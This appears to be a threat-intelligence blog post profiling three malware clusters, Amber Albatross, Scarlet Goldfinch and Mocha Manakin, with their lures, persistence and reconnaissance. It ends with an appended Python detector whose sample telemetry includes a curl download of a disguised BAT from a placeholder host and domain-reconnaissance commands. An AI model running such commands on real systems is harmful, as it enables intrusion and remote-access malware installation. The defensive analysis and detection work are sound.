Midyear threats

Red Canary-named “color birds” accounted for half the top 10 threats we detected in the first half of 2025.

Our most prevalent threats from the first half of 2025 will come as no surprise to regular readers of our monthly Intelligence Insights. However, it’s fascinating to see that Red Canary-named threats account for half of the top 10, which includes stealers, remote management and monitoring (RMM) tools, ransomware precursors, and more.

Top 10 threats detected in the first half of 2025

We’ll briefly analyze the emergent threats in this list, examining what they do and why they’re concerning. We’ll also link to additional resources that security professionals can leverage to improve their defenses.

We’ll focus only on the Red Canary-named threats. Although the Red Canary-named threat Infrared Ibis made our top 10 for the first half of the year, it encompassed a limited, and consequently short-lived, campaign of compromised Google Chrome extensions. Infrared Ibis is the collective name for the compromised version of Cyberhaven Chrome extension version 24.10.4 and additional Chrome extensions dating back to May 2024 identified by Secure Annex research.

You can find extensive information about the rest of the top 10 on the following Threat Detection Report pages:


Amber Albatross is an activity cluster that we first detected in January 2024. In the first half of 2025, Red Canary identified two installation paths currently in use: one via the potentially unwanted program (PUP) PC App Store, and a second via a masquerading utility tool such as Let’s Compress, Zip It Now, or PDFast. The activity cluster downloads and installs a PyInstaller executable with stealer-like capabilities via multiple stages of Windows Command Shell commands, PowerShell, and custom executables. The extracted Python code is protected with Pyarmor, complicating analysis.

Amber Albatross performs a variety of reconnaissance tasks that are consistent with stealer malware, including the following:

  • uses WMIC to detect if a hypervisor is present on the endpoint
  • enumerates the manufacturer, model, and list of Windows software updates
  • checks for installed antivirus and firewall products
  • looks for a wide range of browsers and their development versions, including Edge, Firefox, Chrome, Chromium, Avast Browser, and Brave
  • attempts to access browser profiles or user data folders and checks specific registry keys for managed browsers (e.g., HKLM:\SOFTWARE\Policies\Google\Chrome\CloudManagementEnrollmentToken for Chrome)

Defenders should prioritize developing detection coverage and preventive controls for Amber Albatross for the following reasons:

  • Its stealer-like capabilities could lead to the theft of credentials and sensitive data.
  • Its use of anti-analysis techniques and obfuscation makes it difficult to analyze and detect, allowing it to operate inconspicuously and persist.
  • Its prevalence across our detection dataset suggests that most organizations are potentially susceptible to Amber Albatross infection.
  • While PUPs may be considered lower priority by some teams, Amber Albatross’s use of PC App Store is a good example of how PUPs can serve as an initial access vector for more severe threats.

The following resources include detection and preventive guidance for Amber Albatross:

Scarlet Goldfinch is an initial access threat we first detected in June 2023. It primarily delivers NetSupport Manager, a popular RMM tool, as its follow-on payload, but it has also delivered LummaC2 as a tertiary payload.

Scarlet Goldfinch uses compromised websites to present lures to visitors in hopes of tricking them into downloading and executing malicious code. Historically, Scarlet Goldfinch used fake browser update lures very similar to the classic SocGholish fake update lures. While the style of these lures changed over time, the general theme of a fake update remained through March 2025.

In April 2025, Scarlet Goldfinch made a major change, dropping the fake updates JS scheme in favor of the fake CAPTCHA paste-and-run lures that have taken the initial access world by storm. Despite this shift in TTPs, the end goal of installing NetSupport Manager as the RAT payload of choice has remained the same.

Throughout the first half of 2025, Scarlet Goldfinch paste-and-run lures consistently leveraged curl to pull down a BAT script (disguised as a PHP file on a C2 server) that then used curl to download and PowerShell to extract a ZIP file to install NetSupport Manager.

Over time, Scarlet Goldfinch added character obfuscation to the command-line execution, as well as other defense evasion techniques like using the conhost LOLBAS to spawn a chain of multiple nested cmd.exe processes prior to curl execution.

Scarlet Goldfinch establishes persistence for the NetSupport payload using scheduled tasks and Windows Registry Run keys (e.g., HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Support11, HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\progcs1).

Defenders should prioritize developing detection coverage and preventive controls for Scarlet Goldfinch for the following reasons:

  • Scarlet Goldfinch installs NetSupport Manager, providing adversaries with persistent remote control over victim systems, allowing for unauthorized access and further infection, including the delivery of additional malware.
  • Adversaries use legitimate RMM tools like NetSupport Manager because they can operate with the veneer of legitimacy, helping them blend into the environment. RMM abuse can evade detection because many organizations use these tools for legitimate IT purposes, making it harder to differentiate malicious use from normal activity.
  • Adversaries are actively supporting and developing Scarlet Goldfinch, requiring defenders to continuously analyze the threat and tune their security controls accordingly.
  • Scarlet Goldfinch has been a prevalent threat for a long time and exists within the threat model of most organizations.

The following resources include detection and preventive guidance for Scarlet Goldfinch:

We first detected Mocha Manakin and its payload of choice, the Red Canary-named backdoor NodeInitRAT, in January 2025. Mocha Manakin, similar to Scarlet Goldfinch, uses the paste-and-run technique (aka ClickFix, fakeCAPTCHA) for initial access. Following initial access, Mocha Manakin leverages PowerShell to deliver a NodeJS backdoor called NodeInitRAT that allows adversaries to establish persistence and perform reconnaissance.

Concerningly, Mocha Manakin activity overlaps with Interlock ransomware operations, in that both threats leverage paste and run, NodeInitRAT, and shared infrastructure.

Additionally, NodeInitRAT has the following capabilities:

  • establishes persistence on the system using Windows Registry run keys, often named ChromeUpdater
  • performs system and domain reconnaissance, including enumerating principal names, gathering general domain details, detecting local network neighbors with arp.exe -a, listing services with Get-Service, and checking the current user’s privilege level
  • communicates with adversary-controlled servers over HTTP, frequently using Cloudflare tunnels as intermediary infrastructure
  • allows for arbitrary command execution, including executing nltest, net.exe, and setspn.exe to gather information on domain controllers and domain trusts, and enumerate Service Principal Names
  • deploys additional EXE, DLL, and JS payloads on compromised systems, with JS files sometimes renamed with .log extensions
  • uses XOR encoding and GZIP compression to minimize data transfer and evade inspection

Here’s what NodeInitRAT looks like in the node.exe command line:

(Screenshot: NodeInitRAT in node.exe command line)

Defenders should prioritize developing detection coverage and preventive controls for Mocha Manakin for the following reasons:

  • Given overlaps with Interlock, unmitigated Mocha Manakin activity could lead to ransomware.
  • The paste-and-run initial access technique has proven highly effective for numerous threats.
  • The threat establishes persistence and provides adversaries with remote access and the ability to execute arbitrary commands and deploy additional payloads, granting them significant control over compromised systems.
  • The reconnaissance capabilities of NodeInitRAT can lead to the collection of sensitive system and domain information, which can be leveraged for further, more targeted attacks or data exfiltration.

The following resources include detection and preventive guidance for Mocha Manakin and NodeInitRAT:
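As an added example (not Red Canary’s code or any vendor detection), here is a small Python detector run over constructed process and registry telemetry that flags the three behaviours described above: the Scarlet Goldfinch curl download of a .php-disguised BAT beneath conhost-spawned nested cmd.exe, recon tools launched with node.exe in their parent chain, and Run-key values named Support11, progcs1 or ChromeUpdater. The event schema, hostnames and paths are assumptions.

```python
import re

RUN_KEY = r"software\microsoft\windows\currentversion\run"
RUN_VALUES = {"support11", "progcs1", "chromeupdater"}  # Run-key value names cited above
RECON_TOOLS = {"nltest.exe", "net.exe", "setspn.exe", "arp.exe"}  # tools NodeInitRAT runs

def ancestry(event, by_pid):
    # Image names from the process upward through its parents; guards against pid cycles
    chain, cur, seen = [], event, set()
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur["image"].lower())
        cur = by_pid.get(cur["ppid"])
    return chain

def detect(events):
    """Return (rule, detail) tuples for events matching the behaviours described above."""
    by_pid = {e["pid"]: e for e in events if e["type"] == "process"}
    hits = []
    for e in events:
        if e["type"] == "registry":
            if RUN_KEY in e["key"].lower() and e["value"].lower() in RUN_VALUES:
                hits.append(("run_key_persistence", e["value"]))
            continue
        img, cmd, chain = e["image"].lower(), e["cmdline"].lower(), ancestry(e, by_pid)
        # Scarlet Goldfinch: curl fetching a .php URL into a .bat, under conhost and nested cmd.exe
        if img == "curl.exe" and re.search(r"https?://\S+\.php", cmd) and ".bat" in cmd:
            nested = "conhost.exe" in chain and chain.count("cmd.exe") >= 2
            hits.append(("curl_php_to_bat", "nested_cmd_conhost" if nested else "plain"))
        # NodeInitRAT: domain recon tools with node.exe somewhere in the parent chain
        if img in RECON_TOOLS and "node.exe" in chain:
            hits.append(("node_spawned_recon", img))
    return hits

def P(pid, ppid, image, cmdline):
    return {"type": "process", "pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}

# Constructed sample telemetry (hostnames and paths are placeholders, not real indicators)
SAMPLE_EVENTS = [
    P(100, 1, "explorer.exe", "explorer.exe"),
    P(101, 100, "conhost.exe", "conhost.exe --headless cmd.exe /c ..."),
    P(102, 101, "cmd.exe", "cmd.exe /c cmd.exe /c curl ..."),
    P(103, 102, "cmd.exe", "cmd.exe /c curl ..."),
    P(104, 103, "curl.exe", r"curl http://lure.example.invalid/update.php -o C:\Users\Public\run.bat"),
    P(200, 1, "node.exe", "node.exe <script omitted>"),
    P(201, 200, "cmd.exe", "cmd.exe /c nltest /dclist:"),
    P(202, 201, "nltest.exe", "nltest /dclist:"),
    P(300, 100, "cmd.exe", "cmd.exe"),
    P(301, 300, "arp.exe", "arp -a"),  # benign: an admin running arp from an ordinary shell
    {"type": "registry", "key": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "value": "ChromeUpdater"},
]
```

The benign arp.exe event shows why the node.exe ancestry check matters: the same tool from an interactive shell produces no hit.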
